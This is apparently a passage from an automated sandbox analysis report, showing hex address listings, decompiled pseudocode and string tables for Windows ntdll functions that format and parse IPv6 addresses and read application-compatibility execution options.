                                                                                                                                                      0x01fe1ba2
                                                                                                                                                      0x01f9898c
                                                                                                                                                      0x01f98992
                                                                                                                                                      0x01f98999
                                                                                                                                                      0x01f989ad
                                                                                                                                                      0x01fe1ba8
                                                                                                                                                      0x01fe1ba8
                                                                                                                                                      0x01f989ad
                                                                                                                                                      0x01f989b6
                                                                                                                                                      0x01f989c8
                                                                                                                                                      0x01f989cd
                                                                                                                                                      0x01f989d0
                                                                                                                                                      0x01f989d0
                                                                                                                                                      0x01f989d6
                                                                                                                                                      0x01f989e8
                                                                                                                                                      0x01f989e8
                                                                                                                                                      0x01f989ed
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f989ed
                                                                                                                                                      0x01f9895a
                                                                                                                                                      0x01f9883e
                                                                                                                                                      0x01f98841
                                                                                                                                                      0x01f98844
                                                                                                                                                      0x01f98845
                                                                                                                                                      0x01f98848
                                                                                                                                                      0x01f9884d
                                                                                                                                                      0x01f98852
                                                                                                                                                      0x01f98b49
                                                                                                                                                      0x01f98858
                                                                                                                                                      0x01f9886c
                                                                                                                                                      0x01f9886c
                                                                                                                                                      0x01f98872
                                                                                                                                                      0x01fe1b0e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f98878
                                                                                                                                                      0x01f98881
                                                                                                                                                      0x01f9888b
                                                                                                                                                      0x01f9888e
                                                                                                                                                      0x01f98891
                                                                                                                                                      0x01f98896
                                                                                                                                                      0x01f98899
                                                                                                                                                      0x01f98899
                                                                                                                                                      0x01f9889e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fe1b21
                                                                                                                                                      0x01fe1b27
                                                                                                                                                      0x01fe1b2e
                                                                                                                                                      0x01fe1b42
                                                                                                                                                      0x01fe1b44
                                                                                                                                                      0x01fe1b44
                                                                                                                                                      0x01fe1b4c
                                                                                                                                                      0x01fe1b4f
                                                                                                                                                      0x01fe1b55
                                                                                                                                                      0x01fe1b55
                                                                                                                                                      0x01f988a4
                                                                                                                                                      0x01f988aa
                                                                                                                                                      0x01f988b1
                                                                                                                                                      0x01f988c5
                                                                                                                                                      0x01fe1b5b
                                                                                                                                                      0x01fe1b5b
                                                                                                                                                      0x01f988c5
                                                                                                                                                      0x01f988ce
                                                                                                                                                      0x01f988e0
                                                                                                                                                      0x01f988e5
                                                                                                                                                      0x01f988e8
                                                                                                                                                      0x01f988e8
                                                                                                                                                      0x01f988ee
                                                                                                                                                      0x01f98900
                                                                                                                                                      0x01f98900
                                                                                                                                                      0x01f98905
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f98905

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • WindowsExcludedProcs, xrefs: 01F987C1
                                                                                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 01F98827
                                                                                                                                                      • Kernel-MUI-Language-SKU, xrefs: 01F989FC
                                                                                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 01F98914
                                                                                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 01F987E6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcspbrk
                                                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                      • API String ID: 402402107-258546922
                                                                                                                                                      • Opcode ID: 36445a910fd79122daf1234caea9788ee5dab5b635d612bb288253d51e220cbc
                                                                                                                                                      • Instruction ID: 6b3011008a13f806903583d462606d5803723c1b1eecc26356ac1ac1fa70605c
                                                                                                                                                      • Opcode Fuzzy Hash: 36445a910fd79122daf1234caea9788ee5dab5b635d612bb288253d51e220cbc
                                                                                                                                                      • Instruction Fuzzy Hash: 3BF1E7B2D00209EFDF11EF99CD84DEEBBB8FF18244F14446AE605A7211E7369A45DB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01FB13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 38%
                                                                                                                                                      			E01FB13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E01FA7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x1f72926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E01FA7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x1f79cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E01FA7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E01FA7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E01FA7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E01FA7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                      0x01fb13d5
                                                                                                                                                      0x01fb13d9
                                                                                                                                                      0x01fb13dc
                                                                                                                                                      0x01fb13de
                                                                                                                                                      0x01fb13e1
                                                                                                                                                      0x01fb13e8
                                                                                                                                                      0x01fb13ee
                                                                                                                                                      0x01fde8fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fde921
                                                                                                                                                      0x01fde921
                                                                                                                                                      0x01fde928
                                                                                                                                                      0x01fde982
                                                                                                                                                      0x01fde98a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fde99a
                                                                                                                                                      0x01fde99e
                                                                                                                                                      0x01fde9a3
                                                                                                                                                      0x01fde9a8
                                                                                                                                                      0x01fde9b9
                                                                                                                                                      0x01fde978
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fde978
                                                                                                                                                      0x01fde98a
                                                                                                                                                      0x01fde92a
                                                                                                                                                      0x01fde931
                                                                                                                                                      0x01fde944
                                                                                                                                                      0x01fde944
                                                                                                                                                      0x01fde950
                                                                                                                                                      0x01fde954
                                                                                                                                                      0x01fde959
                                                                                                                                                      0x01fde95e
                                                                                                                                                      0x01fde963
                                                                                                                                                      0x01fde970
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fde975
                                                                                                                                                      0x01fde93b
                                                                                                                                                      0x01fde980
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fde980
                                                                                                                                                      0x01fde942
                                                                                                                                                      0x01fde94b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fde94b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fde942
                                                                                                                                                      0x01fb13f4
                                                                                                                                                      0x01fb13f4
                                                                                                                                                      0x01fb13f9
                                                                                                                                                      0x01fb13fc
                                                                                                                                                      0x01fb13ff
                                                                                                                                                      0x01fb1406
                                                                                                                                                      0x01fde9cc
                                                                                                                                                      0x01fde9d2
                                                                                                                                                      0x01fde9d2
                                                                                                                                                      0x01fde9cc
                                                                                                                                                      0x01fb140c
                                                                                                                                                      0x01fb1411
                                                                                                                                                      0x01fb1431
                                                                                                                                                      0x01fb143a
                                                                                                                                                      0x01fb143c
                                                                                                                                                      0x01fb143f
                                                                                                                                                      0x01fb143f
                                                                                                                                                      0x01fb1442
                                                                                                                                                      0x01fb1447
                                                                                                                                                      0x01fb14a8
                                                                                                                                                      0x01fb14ac
                                                                                                                                                      0x01fde9e2
                                                                                                                                                      0x01fde9e7
                                                                                                                                                      0x01fde9ec
                                                                                                                                                      0x01fdea05
                                                                                                                                                      0x01fdea05
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb1449
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb1449
                                                                                                                                                      0x01fb144c
                                                                                                                                                      0x01fb1459
                                                                                                                                                      0x01fb1462
                                                                                                                                                      0x01fb1469
                                                                                                                                                      0x01fb146a
                                                                                                                                                      0x01fb1470
                                                                                                                                                      0x01fb1473
                                                                                                                                                      0x01fb1476
                                                                                                                                                      0x01fb1476
                                                                                                                                                      0x01fb1490
                                                                                                                                                      0x01fb1495
                                                                                                                                                      0x01fb138e
                                                                                                                                                      0x01fb1390
                                                                                                                                                      0x01fb1397
                                                                                                                                                      0x01fb1398
                                                                                                                                                      0x01fb1399
                                                                                                                                                      0x01fb13a1
                                                                                                                                                      0x01fb13a4
                                                                                                                                                      0x01fb13a4
                                                                                                                                                      0x01fb1498
                                                                                                                                                      0x01fb149c
                                                                                                                                                      0x01fb149f
                                                                                                                                                      0x01fb14a2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb14a4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb14a4
                                                                                                                                                      0x01fb1413
                                                                                                                                                      0x01fb1415
                                                                                                                                                      0x01fb1416
                                                                                                                                                      0x01fb1419
                                                                                                                                                      0x01fb141c
                                                                                                                                                      0x01fb1422
                                                                                                                                                      0x01fb13b7
                                                                                                                                                      0x01fb13bc
                                                                                                                                                      0x01fb13bf
                                                                                                                                                      0x01fb13bf
                                                                                                                                                      0x01fb13c2
                                                                                                                                                      0x01fb1424
                                                                                                                                                      0x01fb1424
                                                                                                                                                      0x01fb1424
                                                                                                                                                      0x01fb1427
                                                                                                                                                      0x01fb142b
                                                                                                                                                      0x01fb142c
                                                                                                                                                      0x01fb142c
                                                                                                                                                      0x01fb142c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb141c
                                                                                                                                                      0x01fb1411

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                      • Opcode ID: 6fe006eee20a098f87056e25465380a5e665925468db0c82b608cb242f4191f3
                                                                                                                                                      • Instruction ID: 6e99f4016531e3197ac3f5201a1bb906c38dd8c00db239319ca448c35e9acf78
                                                                                                                                                      • Opcode Fuzzy Hash: 6fe006eee20a098f87056e25465380a5e665925468db0c82b608cb242f4191f3
                                                                                                                                                      • Instruction Fuzzy Hash: 1F6165B1D04606EACB24DF5ED8E08FFBBB6EF95300718C12EE5D647541E23AA640CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01FA7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E01FA7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2052088; // 0x774e8a49
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E01FA7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E01FC3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E01F7DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2054218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E01FC3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E01F80D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E01FC3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E01F88375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E01FC3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E01FEE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E01FC3F92();
					_t38 = 1;
					L2:
					return E01F7E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                      0x01fa7f08
                                                                                                                                                      0x01fa7f0f
                                                                                                                                                      0x01fa7f12
                                                                                                                                                      0x01fa7f1b
                                                                                                                                                      0x01fa7f31
                                                                                                                                                      0x01fc3ead
                                                                                                                                                      0x01fc3eb4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc3eba
                                                                                                                                                      0x01fc3ecd
                                                                                                                                                      0x01fc3ed2
                                                                                                                                                      0x01fc3ee1
                                                                                                                                                      0x01fc3ee7
                                                                                                                                                      0x01fc3eec
                                                                                                                                                      0x01fc3f12
                                                                                                                                                      0x01fc3f18
                                                                                                                                                      0x01fc3f1a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc3f20
                                                                                                                                                      0x01fc3f26
                                                                                                                                                      0x01fc3f28
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc3f2e
                                                                                                                                                      0x01fc3f30
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc3f3a
                                                                                                                                                      0x01fc3f3b
                                                                                                                                                      0x01fc3f53
                                                                                                                                                      0x01fc3f64
                                                                                                                                                      0x01fc3f69
                                                                                                                                                      0x01fc3f6c
                                                                                                                                                      0x01fc3f6d
                                                                                                                                                      0x01fc3f6f
                                                                                                                                                      0x01fce304
                                                                                                                                                      0x01fce30f
                                                                                                                                                      0x01fce315
                                                                                                                                                      0x01fce31e
                                                                                                                                                      0x01fce321
                                                                                                                                                      0x01fce327
                                                                                                                                                      0x01fce329
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fce32f
                                                                                                                                                      0x01fce32f
                                                                                                                                                      0x01fce337
                                                                                                                                                      0x01fce33a
                                                                                                                                                      0x01fce33b
                                                                                                                                                      0x01fce33d
                                                                                                                                                      0x01fce33f
                                                                                                                                                      0x01fce341
                                                                                                                                                      0x01fce341
                                                                                                                                                      0x01fce34e
                                                                                                                                                      0x01fce353
                                                                                                                                                      0x01fce358
                                                                                                                                                      0x01fce35d
                                                                                                                                                      0x01fce35f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fce365
                                                                                                                                                      0x01fce365
                                                                                                                                                      0x01fce368
                                                                                                                                                      0x01fce36e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fce374
                                                                                                                                                      0x01fce32f
                                                                                                                                                      0x01fc3f75
                                                                                                                                                      0x01fc3f7a
                                                                                                                                                      0x01fc3f7c
                                                                                                                                                      0x01fc3f7e
                                                                                                                                                      0x01fc3f86
                                                                                                                                                      0x01fa7f39
                                                                                                                                                      0x01fa7f47
                                                                                                                                                      0x01fa7f47
                                                                                                                                                      0x01fa7f37
                                                                                                                                                      0x01fa7f37
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01FC3F12
                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01FC3EC4
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01FC3F75
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01FC3F4A
                                                                                                                                                      • Execute=1, xrefs: 01FC3F5E
                                                                                                                                                      • ExecuteOptions, xrefs: 01FC3F04
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01FCE345
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01FCE2FB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BaseDataModuleQuery
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 3901378454-484625025
                                                                                                                                                      • Opcode ID: d32d481f2c503c823ccc9909e785011fc9a6fa196a47f418a9a8c2af08e5f395
                                                                                                                                                      • Instruction ID: 216b5e0af3a9c1fd1a7cc64b7ca217f58f0a1682eac8ad1220b56b6de61a58a6
                                                                                                                                                      • Opcode Fuzzy Hash: d32d481f2c503c823ccc9909e785011fc9a6fa196a47f418a9a8c2af08e5f395
                                                                                                                                                      • Instruction Fuzzy Hash: E641EB71A4031EBADB20EE94DCC5FDA77BCAF14700F4005AEA105E6081EB73DB468BA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01FB0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E01FB0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E01F88980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E01F7DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E01FB0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E01FB0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E01FB06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E01FB06BA(_t135, _t178) == 0 || E01FB0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E01FB0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E01FB0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E01FB06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E01FB06BA(_t124, _t142) == 0 || E01FB0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
